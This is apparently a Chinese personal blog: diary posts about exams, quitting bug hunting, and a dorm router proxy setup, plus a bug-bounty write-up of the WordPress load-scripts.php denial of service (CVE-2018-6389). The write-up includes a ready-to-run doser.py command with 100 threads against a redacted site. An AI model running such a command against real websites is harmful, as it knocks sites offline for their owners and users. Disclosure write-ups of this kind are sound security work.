一些想法 作者: lattice 时间: 2019-03-10 分类: 生活日记,日常生活 评论 ## 开头 hi...已经五天没有发过blog了哈哈哈 文章的观看量也越来越低了 随意吧 无聊的复习周终于过了,下周一到周三就是考试,考完就能回国放春假了..急死人 ## 瞎写 说句实话,自从在国外学习之后真的都忙不过来 包括公司部分的业务也没有余力去完成 现在回想起来,自一月底在bugx提交的最后一个漏洞之后 到现在已经接近两个多月没有在进行任何的漏洞挖掘了 现在挖起来真的好多东西都已经忘了 在这两个月期间一直在纠结是否放弃挖洞,因为真的害怕学业跟不上就打道回府了 相信看过我个人介绍的朋友都知道我高中学的是音乐,说句实话,高中那两年学的音乐真的把我给学废了,很多文化课的知识全都没学到然后就直接来读预科,学的又是初高中知识,然而我已经忘得差不多了 实在没有办法了 ## 想了很久才做的决定但是不能保证会不会“真香” 想了很久呀...才做出至少今年内彻底放弃挖洞的这个决定 今年开年之后我也只有在bugx提交过漏洞并且我也知道还有很多团队的小伙伴还在bugx平台上面奋斗着,毕竟现在团队一直有一个非常好的排名,谁都不愿意掉下去 bugx是个很好的平台也有一个很好的运营,在下这个决定之前我也有想novy征求过建议  **截图里的“日”指的是“挖洞”,谢谢(微笑)** 因为个人能力、时间有限以及平台一些漏洞收集计划的改变,所以我打算暂时退出bugx并且团队也在bugx变成半退出状态,就如上面截图所说的 ## END 谢谢bugx平台以及在bugx提交过漏洞的所有白帽100队员们,感谢你们给团队带来了bugx第一赛季中第二名的好成绩 最后也没啥好说的了,个人只想专注于生活和学习吧  有什么问题可以随时微信找我(网站的“关于”里可以找到我的微信)
【跳车篇】这个傻逼宿舍...我要气死了 作者: lattice 时间: 2019-03-05 分类: 生活日记,日常生活 评论 ## 到底是跳哪一篇的车呢? 别说了,就是上一篇的 [【预告】在宿舍装路由器并刷回国酸S酸S乳R过程记录](https://www.heavensec.org/archives/64.html "【预告】在宿舍装路由器并刷回国酸S酸S乳R过程记录") ## 为啥呢?? MMP我整套东西都搭好了,结果路由器一直连不上网 然后我就上了宿舍这边的网络提供商网站上面一看  直接不给装路由器了都...接上了就直接屏蔽端口..我能有什么办法 实在没办法...全拆下来了 那我就给大家提供之前我说的宿舍回国和家庭酸S酸S乳R具体的走线图吧(哭) ## 路由器具体怎么刷呢(固件、开发版、酸S酸S乳R) 欸嘿嘿,为了锁定流量,我决定留到不知道多久之后的那一边博客再写(我懒) ## 宿舍方案  准确来说,弟弟我的方案是肯定行得通的,结果宿舍方爸爸这样弄我也没办法,被弄成弟弟(具体为啥看上面) ## 家庭方案  这个方案适用于国内小伙伴家里的家庭酸S酸S乳R看外面网站的需求,所有设备可以直接WIFI连接,台式机如果使用网线,可以网线插一级路由再买个usb的WIFI接收器(几十RMB..不会多于50RMB的),有需要时直接连接二级路由看外面网站就行 ## 最后!! **该方案适用于手机以及电脑wifi连接回国** 有什么问题随时可以在下方留言!! 熟人直接wechat找我也可以!!
【预告】在宿舍装路由器并刷回国酸S酸S乳R过程记录 作者: lattice 时间: 2019-02-26 分类: 生活日记,日常生活 评论 上周换了宿舍,结果房间里面只有一个网线的插口(气死) 在amazon uk找了一圈网线分线器都没有看到合适的 一上狗东就找到了合适的一款绿联的分线器(不打广告) 然后就买了一堆网线和分线器,因为...amazon uk的东西真的太贵了,大天朝还是牛逼啊 因为英国这边没法用网易云还有看各种什么xxx视频软件,所以顺便要家里寄过来一个之前自己刷过开发者和工具包的小米路由器2A(usb版)过来 经历了一个周末,今天终于到了  过几天有空了会把这WiFi设备搭起来 顺便给大家记录下来如何给小米路由器2A(usb版)刷开发者模式加固件 如果到时各位小伙伴不懂的话... 我还会画一张在自己宿舍里面搭路由器具体线路的走线图 (顺便再提供一张在国内家里如何使用双路由实现国内、翻墙的走线图给大家参考) **预计成本: (以下为国内价格,国外的话翻一倍就行,求别来跟我杠) 国内服务器:50元/月 路由器:我忘了,反正我爸买的,自己没花钱233333 网线:5.9元(0.5米长)+7.9元(1米长) 分线器:39元(两个) **
发一些近日安排吧(划水篇) 作者: lattice 时间: 2019-02-17 分类: 生活日记,日常生活,日常吐槽 评论 # 近日安排 ## 二月份安排 Feb to Mar ### 现在是17.2.2019的下午14:50 学习太忙了...没有任何心情挖洞 所以选择停止挖洞,好好学习 (免得又被adrian大佬说我不好好学习...) 这几周要好好学习啦,数学和物理自我感觉太差了...得好好背一下公式啥的了 2月28号supreme伦敦换完季就重新开门啦 (激动..因为听说官方实体店最贵也就2kRMB??) ## 三月份安排 Mar to Apr 打算3月2号跟同学直接rush伦敦一波血拼好吧23333虽然买完当天就直接会谢菲尔德了.. 因为伦敦物价太高了,买完就溜mmp 3月15号谢大国际学院的spring term就结束liao,但是后面跟着一个5天的exam week...无法理解为啥要考五天 考完之后就放春假啦!!!!! 所以..很早之前我就定好了回国的机票,考完试的第二天3月16号就直接回国,17号就能到广州了233333 在3月24号有场演出,又可以上台打碟了(来自肥菜憨厚的笑声) 然后29号又飞回英国了...伤心,雅思成绩低了点就是这样的啦... **以上内容总结:好好学习吧,想要我挖洞是不可能的了**
分享一个连审核都不想审,就给了1分的刁钻拒绝服务案例 作者: lattice 时间: 2019-02-07 分类: 网络安全 评论 ## 开头语 像我这种菜鸡就只能挖这种傻逼刁钻的漏洞了(打扰,没耐心的还是别挖了...真的) 这个洞是之前挖某个src碰到了一个wordpress站,欸!信心满满好不好 毕竟想起n年前把某回收直接getshell,因为他们站也是用的wordpress(就是做得很大的那个某回收,况且很多人盯着他们网站的模板,的确做得不错,漏洞很早之前以及提交补天了) ## 问题详细 可发现站点所使用的网站系统为 wordpress4.6.x 出现问题的链接:https://xxx.xxx.com/wp-admin/load-scripts.php?c=1&load[]=jquery-ui-core,editor&ver=4.9.1 可参考链接:https://www.vulnspy.com/cn-cve-2018-6389-wordpress-denial-of-service-dos-vulnerability/ 导致拒绝服务的文件内容:  咱们可以在这个js文件中看到,引用了很多的js和css文件 wordpress呢就允许用户通过这个load-scripts.php 文件一次性载入多个JS文件和CSS文件,例如请求`https://xxx.xxx.com/wp-admin/load-scripts.php?c=1&load[]=jquery-ui-core,editor&ver=4.9.1` 此时load-scripts.php将自动加载jquery-ui-core和editor文件并返回文件内容 所以我们可以向这个js文件发起多次载入文件请求而消耗资源引起拒绝服务 ## 利用方法 利用脚本:https://github.com/quitten/doser.py 构造命令: ```python python doser.py -g 'http://xxx.xxx.com/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9' -t 100 ``` ## 利用结果 在多次请求之后最终可导致拒绝服务(没有开高线程,所以导致临时性的无法访问,但是长时间攻击即可导致网站一直无法访问)  ## 漏洞分析(引用自Vulnspy) 在文件`WordPress/wp-admin/load-scripts.php`中:  load-scripts.php 文件会根据load参数传入的文件名依次载入文件并输出。同时程序对load参数的内容进行了过滤,只有在白名单$wp_scripts中的JS文件才会被载入。 该JS文件白名单的内容在文件`WordPress/wp-includes/script-loader.php`中:  JS文件白名单中共有181个文件。如果我们请求`load-scripts.php`文件使其同时载入全部JS文件,PHP代码将要进行181次的读取操作。若同时发起多个载入全部JS文件的请求,这将极大地消耗服务器资源,即有可能导致网站无法正常响应其他用户的请求。